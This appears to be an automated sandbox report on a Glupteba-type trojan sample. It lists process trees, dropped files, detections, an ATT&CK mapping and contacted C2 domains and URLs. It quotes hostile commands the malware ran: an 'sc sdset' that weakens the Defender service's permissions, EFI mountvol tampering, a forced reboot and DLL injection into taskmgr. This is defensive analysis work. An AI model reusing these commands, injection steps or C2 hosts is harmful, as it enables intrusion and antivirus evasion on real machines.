        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp | Binary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
        Source: upd.exe, 00000005.00000002.321801363.0000000000FE8000.00000004.00000020.sdmp, upd.exe, 00000008.00000002.350773419.0000000000EC7000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Tools-All, Intended State: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:57, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 908ea1a77ea441bcdf0a5b3d829d1614, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6739fa9f684abbea4b2e76cf14a0a1f4, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 23bad0369164ebf4f04ee41a74386028, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe | Binary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2d446151824b69a919c7d5646f0806b8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: upd.exe, csrss.exe | Binary or memory string: AhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-62, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, new state: Off
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019BE1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019D9D3C GetProcessHeap,
        Source: C:\Users\user\Desktop\upd.exe | Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019BD8BC SetUnhandledExceptionFilter,_invalid_parameter_noinfo,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019C543C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019BE37C SetUnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019BDE24 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

        HIPS / PFW / Operating System Protection Evasion:

        Contains functionality to inject threads in other processes
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019B27F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,
        Performs DNS TXT record lookups
        Source: Traffic | DNS traffic detected: queries for: trumops.com
        Source: Traffic | DNS traffic detected: queries for: logs.trumops.com
        Source: Traffic | DNS traffic detected: queries for: 442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
        Source: Traffic | DNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe | Process created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update
        Source: C:\Users\user\Desktop\upd.exe | Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\windefender.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp | Binary or memory string: Program Manager
        Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp | Binary or memory string: Progman
        Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: EnumSystemLocalesW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: EnumSystemLocalesW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: EnumSystemLocalesW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: try_get_function,GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019D5140 cpuid
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019BE0C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Users\user\Desktop\upd.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

        Remote Access Functionality:

        Yara detected Metasploit Payload
        Source: Yara match | File source: 11.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 5.2.upd.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 8.2.upd.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Techniques per tactic column (numbers in parentheses are the counts attached to the technique names in the matrix):

        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
        Execution: Windows Management Instrumentation (21); Command and Scripting Interpreter (2); Scheduled Task/Job (1); Service Execution (1); Cron; Launchd; Scheduled Task
        Persistence: Windows Service (1); Scheduled Task/Job (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
        Privilege Escalation: Windows Service (1); Process Injection (112); Scheduled Task/Job (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
        Defense Evasion: Obfuscated Files or Information (11); Software Packing (11); Masquerading (231); Virtualization/Sandbox Evasion (2); Process Injection (112); Steganography; Compile After Delivery
        Credential Access: Credential API Hooking (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
        Discovery: System Time Discovery (1); File and Directory Discovery (1); System Information Discovery (34); Security Software Discovery (241); Virtualization/Sandbox Evasion (2); Process Discovery (13); Remote System Discovery (1)
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
        Collection: Archive Collected Data (1); Credential API Hooking (1); Input Capture (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
        Command and Control: Ingress Tool Transfer (13); Encrypted Channel (11); Non-Application Layer Protocol (4); Application Layer Protocol (25); Proxy (1); Multiband Communication; Commonly Used Port
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
        Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

        Behavior Graph

        Behavior Graph ID: 515565; Sample: 0NlSa5bf55; Start date: 04/11/2021; Architecture: WINDOWS; Score: 100
        Top-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Antivirus detection for dropped file; 11 other signatures
        Processes started at the top level: 0NlSa5bf55.exe; svchost.exe; svchost.exe; 4 other processes

        Process tree (network contacts, dropped files, signatures and child processes per node):

        0NlSa5bf55.exe
            Network: runmodes.com (172.67.207.136, ports 443, 49749, 49750; CLOUDFLARENETUS, United States); trumops.com; 2 other IPs or domains
            Dropped: C:\Users\user\Desktop\upd.exe (PE32)
            Started: upd.exe; conhost.exe
            upd.exe
                Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Drops PE files with benign system names
                Started: upd.exe
                upd.exe
                    Dropped: C:\Windows\rss\csrss.exe (PE32)
                    Signatures: Drops executables to the windows directory (C:\Windows) and starts them
                    Started: csrss.exe
                    csrss.exe
                        Network: trumops.com; runmodes.com; 5 other IPs or domains
                        Dropped: C:\Windows\windefender.exe (PE32); C:\Users\user\AppData\Local\...\injector.exe (PE32+); C:\Users\...\NtQuerySystemInformationHook.dll (PE32+); 5 other files (none is malicious)
                        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
                        Started: injector.exe; windefender.exe; schtasks.exe; 6 other processes
                        injector.exe
                            Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Contains functionality to inject threads in other processes
                            Started: conhost.exe
                        windefender.exe
                            Started: cmd.exe; conhost.exe
                            cmd.exe
                                Started: sc.exe
                        schtasks.exe
                            Started: conhost.exe
                        6 other processes
                            Started: conhost.exe; conhost.exe; conhost.exe; 3 other processes
        svchost.exe
            Network: 192.168.2.1 (unknown, unknown)


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        0NlSa5bf55.exe | 67% | Virustotal |
        0NlSa5bf55.exe | 64% | ReversingLabs | Win32.Trojan.WinGoRanumBot

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | 100% | Avira | TR/Agent.twerk
        C:\Users\user\Desktop\upd.exe | 100% | Avira | TR/AD.GoCloudnet.vvvot
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | 100% | Avira | TR/Redcap.gsjan
        C:\Windows\windefender.exe | 100% | Avira | TR/Crypt.XPACK.eocey
        C:\Windows\rss\csrss.exe | 100% | Avira | TR/AD.GoCloudnet.vvvot
        C:\Users\user\Desktop\upd.exe | 100% | Joe Sandbox ML |
        C:\Windows\rss\csrss.exe | 100% | Joe Sandbox ML |
        B:\EFI\Boot\old.efi (copy) | 0% | ReversingLabs |
        B:\EFI\Microsoft\Boot\fw.efi (copy) | 0% | ReversingLabs |
        C:\EFI\Boot\EfiGuardDxe.efi | 0% | ReversingLabs |
        C:\EFI\Boot\bootx64.efi | 0% | ReversingLabs |
        C:\EFI\Microsoft\Boot\bootmgfw.efi | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | 46% | Metadefender |
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | 59% | ReversingLabs | Win64.Trojan.Glupject
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | 14% | Metadefender |
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | 73% | ReversingLabs | Win64.Trojan.Glupteba
        C:\Users\user\Desktop\upd.exe | 31% | Metadefender |
        C:\Users\user\Desktop\upd.exe | 86% | ReversingLabs | Win32.Trojan.WinGoRanumBot
        C:\Windows\rss\csrss.exe | 31% | Metadefender |
        C:\Windows\rss\csrss.exe | 86% | ReversingLabs | Win32.Trojan.WinGoRanumBot
        C:\Windows\windefender.exe | 29% | Metadefender |
        C:\Windows\windefender.exe | 79% | ReversingLabs | Win32.Trojan.WinGoRanumBot

        Unpacked PE Files

        Source | Detection | Scanner | Label
        11.2.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        5.0.upd.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        0.0.0NlSa5bf55.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        11.2.csrss.exe.11c38000.10.unpack | 100% | Avira | TR/Patched.Ren.Gen
        11.0.csrss.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        11.0.csrss.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        11.2.csrss.exe.11bb8000.9.unpack | 100% | Avira | TR/Patched.Ren.Gen
        5.0.upd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        5.0.upd.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        43.0.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        0.3.0NlSa5bf55.exe.115f2000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
        0.3.0NlSa5bf55.exe.115f4000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
        11.0.csrss.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        0.2.0NlSa5bf55.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        43.2.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        5.2.upd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        37.0.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        5.0.upd.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        8.0.upd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        11.0.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        0.3.0NlSa5bf55.exe.115f6000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
        8.2.upd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        37.2.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

        Domains

        Source | Detection | Scanner | Label
        runmodes.com | 7% | Virustotal |
        server16.trumops.com | 7% | Virustotal |
        gohnot.com | 11% | Virustotal |
        server2.trumops.com | 7% | Virustotal |

        URLs


        Domains and IPs

        Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
runmodes.com | 172.67.207.136 | true | true | | unknown
server16.trumops.com | 172.67.139.144 | true | false | | unknown
gohnot.com | 104.21.92.165 | true | false | | unknown
server2.trumops.com | 104.21.79.9 | true | false | | unknown
trumops.com | unknown | unknown | true | | unknown
442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com | unknown | unknown | true | | unknown
logs.trumops.com | unknown | unknown | true | | unknown
e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com | unknown | unknown | true | | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
https://runmodes.com/api/log | true | Avira URL Cloud: malware | unknown
http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/app.exe | false | Avira URL Cloud: safe | unknown
https://server2.trumops.com/api/poll | false | Avira URL Cloud: safe | unknown
http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/watchdog.exe | false | Avira URL Cloud: safe | unknown
https://server16.trumops.com/api/cdn?c=dfd675dbadcd07bb&kind=main&uuid= | false | Avira URL Cloud: safe | unknown
https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e | false | Avira URL Cloud: safe | unknown
https://server2.trumops.com/api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e | false | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries


                                                  Contacted IPs


                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
172.67.139.144 | server16.trumops.com | United States | 13335 | CLOUDFLARENETUS | false
104.21.92.165 | gohnot.com | United States | 13335 | CLOUDFLARENETUS | false
104.21.79.9 | server2.trumops.com | United States | 13335 | CLOUDFLARENETUS | false
172.67.207.136 | runmodes.com | United States | 13335 | CLOUDFLARENETUS | true

                                                  Private

IP: 192.168.2.1

                                                  General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 515565
Start date: 04.11.2021
Start time: 13:11:36
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 59s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 0NlSa5bf55 (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 49
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.evad.winEXE@41/15@21/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 98.7% (good quality ratio 80.1%)
• Quality average: 58.5%
• Quality standard deviation: 36.8%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, csrss.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.79.89.181, 23.211.6.115, 20.54.110.249, 52.251.79.25
• Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e16646.dscg.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

Time | Type | Description
--- | --- | ---
13:12:43 | API Interceptor | 9x Sleep call for process: upd.exe modified
13:13:00 | API Interceptor | 5x Sleep call for process: csrss.exe modified
13:13:08 | Task Scheduler | Run new task: csrss path: C:\Windows\rss\csrss.exe
13:13:28 | API Interceptor | 8x Sleep call for process: svchost.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

Match | Associated Sample Name / URL | Detection | Context
--- | --- | --- | ---
172.67.139.144 | f6oNLRKHUy.exe | malicious |
172.67.139.144 | jkDmft1Qoe.exe | malicious |
104.21.92.165 | f6oNLRKHUy.exe | malicious | gohnot.com/0281c43f36eb9f47aab5357d48bbc076/watchdog.exe
104.21.79.9 | f6oNLRKHUy.exe | malicious |
104.21.79.9 | jkDmft1Qoe.exe | malicious |

                                                          Domains

Match | Associated Sample Name / URL | Detection | Context
--- | --- | --- | ---
gohnot.com | f6oNLRKHUy.exe | malicious | 104.21.92.165
gohnot.com | jkDmft1Qoe.exe | malicious | 172.67.196.11
runmodes.com | f6oNLRKHUy.exe | malicious | 104.21.34.203

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

Match | Associated Sample Name / URL | Detection
B:\EFI\Boot\old.efi (copy) | f6oNLRKHUy.exe, jkDmft1Qoe.exe, app.exe, csrss.exe, csrss.exe, gFNUQfsbhl.exe, AHRwK0YGzi.exe, xYVQ2CgP0M.exe, HAZhIgUBm9.exe, hwvUt9M5T0.exe, 7u479GG98a.exe, bjEAtgsQV8.exe, bxW8vusMVJ.exe, 5uy2bFmu5S.exe, ddscRyPcLJ.exe, v1Ni5GOWI6.exe, A9j7TdY8pG.exe, 10hORi8M8E.exe, 5H9JkoJNvF.exe, mLvt2Sebz3.exe | all malicious

                                                                                                  Created / dropped Files

                                                                                                  B:\EFI\Boot\old.efi (copy)
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7680
                                                                                                  Entropy (8bit):4.486535052248291
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                  MD5:17ACB515B5FA45DEF030B191E5BC7991
